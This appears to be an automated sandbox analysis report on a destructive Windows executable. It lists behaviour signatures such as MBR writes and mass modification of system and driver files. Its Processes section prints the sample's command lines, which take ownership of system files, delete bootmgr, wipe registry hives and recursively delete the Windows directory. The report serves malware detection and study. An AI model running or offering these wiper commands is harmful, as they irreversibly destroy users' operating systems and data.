Analysis Overview
SHA256
34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0
Threat Level: Likely malicious
The file 34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0 was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Manipulates Digital Signatures
Drops file in Drivers directory
Executes dropped EXE
Modifies file permissions
Checks computer location settings
Reads user/profile data of web browsers
Boot or Logon Autostart Execution: Print Processors
Loads dropped DLL
Writes to the Master Boot Record (MBR)
Drops desktop.ini file(s)
Indicator Removal: File Deletion
Drops autorun.inf file
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Modifies registry key
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-12 15:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-12 15:17
Reported
2024-10-12 15:19
Platform
win7-20241010-en
Max time kernel
120s
Max time network
16s
Command Line
Signatures
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\wintrust.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wintrust.dll | C:\Windows\system32\cmd.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Boot or Logon Autostart Execution: Print Processors
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\spool\prtprocs\x64\winprint.dll | C:\Windows\system32\cmd.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Windows\system32\cmd.exe | N/A |
Indicator Removal: File Deletion
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..ccessagent-binaries_31bf3856ad364e35_6.1.7600.16385_none_de06b4fbd5b45f78\autorun.inf | C:\Windows\system32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\spool\prtprocs\x64\winprint.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\webservices.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\advapi32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wintrust.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msctf.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\audiosrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\SAM~1.LOG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\hid.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msv1_0.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI62D3~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\iertutil.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\lpk.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\9w3j6e.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\HARDWA~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msvcrt.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\localspl.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\upnp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\IconCodecService.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ws2_32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\nsi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\atl.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\cryptui.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\difxapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dnsapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\rasdlg.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\scecli.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\acppage.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\imm32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\FXSAPI.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\UIAnimation.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\umpnpmgr.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\LogFiles\WMI\RtBackup\ETWRTD~1.ETL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\EhStorShell.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\browser.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ncsi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\pnrpnsp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wscui.cpl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\es.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wbem\wbemprox.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WSHTCPIP.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\hcproviders.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\devobj.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wbem\wmiutils.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MICA77~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\TxR\{01688~2.BLF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\imm32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\duser.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsCodecs.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MIBED6~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winmm.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\vssapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\SOFTWA~1.LOG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\spoolsv.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\comctl32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dllhost.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI319B~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI7771~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\RegBack\SYSTEM | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\TxR\{01688~3.REG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\gameux.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sxssrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\vsstrace.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\kernel32.dll | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\Desktop | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM6A9E~1.163\rasadhlp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMF869~1.163\sechost.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\ko-KR_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_3369~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRDDAB~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIAUTO~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Fonts\tahomabd.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM7188~1.175\wiarpc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMC999~1.175\winhttp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM1148~1.175\umb.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\WO58AE~1.163\normaliz.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\nb-NO_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM517E~1.163\WSDMon.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM1CCF~1.163\msutb.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\debug\PASSWD.LOG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\LOCALS~1\NTUSER~2.LOG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\LOCALS~1\NTUSER~1.REG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AME0F9~1.175\credssp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM71EE~1.175\WMIsvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM9C03~1.175\wbemsvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\it-IT_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\tr-TR_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~4 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SY2C2F~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\inficon.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_6.1.7601.17514_sl-si_3e801d820cb4f389\SL-SI_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Tasks\SCHEDLGU.TXT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_6.1.7601.17514_hu-hu_412532939d54c9f8\HU-HU_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_6.1.7601.17514_tr-tr_e55b2bd8fce5fac8\TR-TR_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM3E1F~1.175\msxml6.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\X89CF7~1.164\iertutil.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\fi-FI_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\LOCALS~1\Pictures | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMEEB9~1.175\msasn1.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM734B~1.175\ntdll.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM1B25~1.175\lsm.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMFF97~1.163\version.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM66CA~1.175\comctl32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_6.1.7601.17514_fi-fi_f61840f9bb3cd6a4\FI-FI_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMB4A2~1.175\gpsvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMEB0A~1.175\IPHLPAPI.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\WODA86~1.175\shell32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\WPFGFX~2.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\oisicon.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Web\WALLPA~1\Nature | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM4F52~1.175\aelupsvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM37B2~1.163\basesrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM3E37~1.175\ole32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM1080~1.175\devobj.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM9C34~1.163\msiltcfg.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM5CF3~1.163\Syncreg.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_6.1.7601.17514_bg-bg_68d21d71f179ba4c\BG-BG_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Media\Festival | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMC1F8~1.163\WlS0WndH.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~2.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\Music | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMFD37~1.175\locale.nls | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM66D9~1.175\SYNCCE~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM7755~1.175\netshell.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM2FAB~1.175\localspl.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMCEB1~1.175\shdocvw.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM9C03~1.175\FRAMED~1.DLL | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe
"C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f %windir%\System32\Taskkill.exe >nul 2>nul && icacls %windir%\System32\Taskkill.exe /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Taskkill.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Taskkill.exe /grant administrators:F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q %windir%\System32\Taskkill.exe >nul 2>nul
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f %windir%\System32\Tskill.exe >nul 2>nul && icacls %windir%\System32\Tskill.exe /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Tskill.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Tskill.exe /grant administrators:F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q %windir%\System32\Tskill.exe >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f %windir%\*.* >nul 2>nul && icacls %windir%\*.* /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\*.*
C:\Windows\system32\icacls.exe
icacls C:\Windows\*.* /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f %windir%\System32\*.* >nul 2>nul && icacls %windir%\System32\*.* /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\*.*
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\*.* /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/* /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/* /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/.exe /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/.exe /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/exefile /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/exefile /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/.dll /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/.dll /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCU/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCU/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKLM/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKLM/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKU/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKU/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCC/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCC/* /va /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\bootmgr >nul 2>nul && icacls C:\bootmgr /grant administrators:F >nul 2>nul && attrib -s -h -r C:\bootmgr
C:\Windows\system32\takeown.exe
takeown /f C:\bootmgr
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q C:\bootmgr >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q /a %windir% >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rd /s /q %windir% >nul 2>nul
Network
Files
memory/1664-0-0x0000000000400000-0x000000000040D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-12 15:17
Reported
2024-10-12 15:19
Platform
win10v2004-20241007-en
Max time kernel
139s
Max time network
125s
Command Line
Signatures
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\udfs.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\usbd.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\beep.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\drmk.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mouclass.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\null.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\storahci.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\http.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\i8042prt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mrxsmb.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Ndu.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\RLCC9S~1.SYS | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\usbehci.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\winhvr.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\usbport.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\dfsc.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hdaudbus.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hidusb.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ksthunk.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tdx.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\rdpbus.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\vhdmp.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\fsdepends.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\kbdclass.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mouhid.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\npsvctrig.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\nsiproxy.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\netbt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Vid.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\bindflt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\bowser.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\cimfs.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\dumpfve.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mpsdrv.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\watchdog.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ahcache.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mmcss.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\netbios.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\storqosflt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\usbhub.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\afd.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\condrv.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\npfs.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\pacer.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\cdfs.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mssmbios.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ndiscap.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tdi.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\msfs.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\rdbss.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tcpipreg.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\amdppm.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Diskdump.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hidclass.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\kdnic.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ks.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Rtnic64.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\vwififlt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\csc.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\filecrypt.sys | C:\Windows\system32\cmd.exe | N/A |
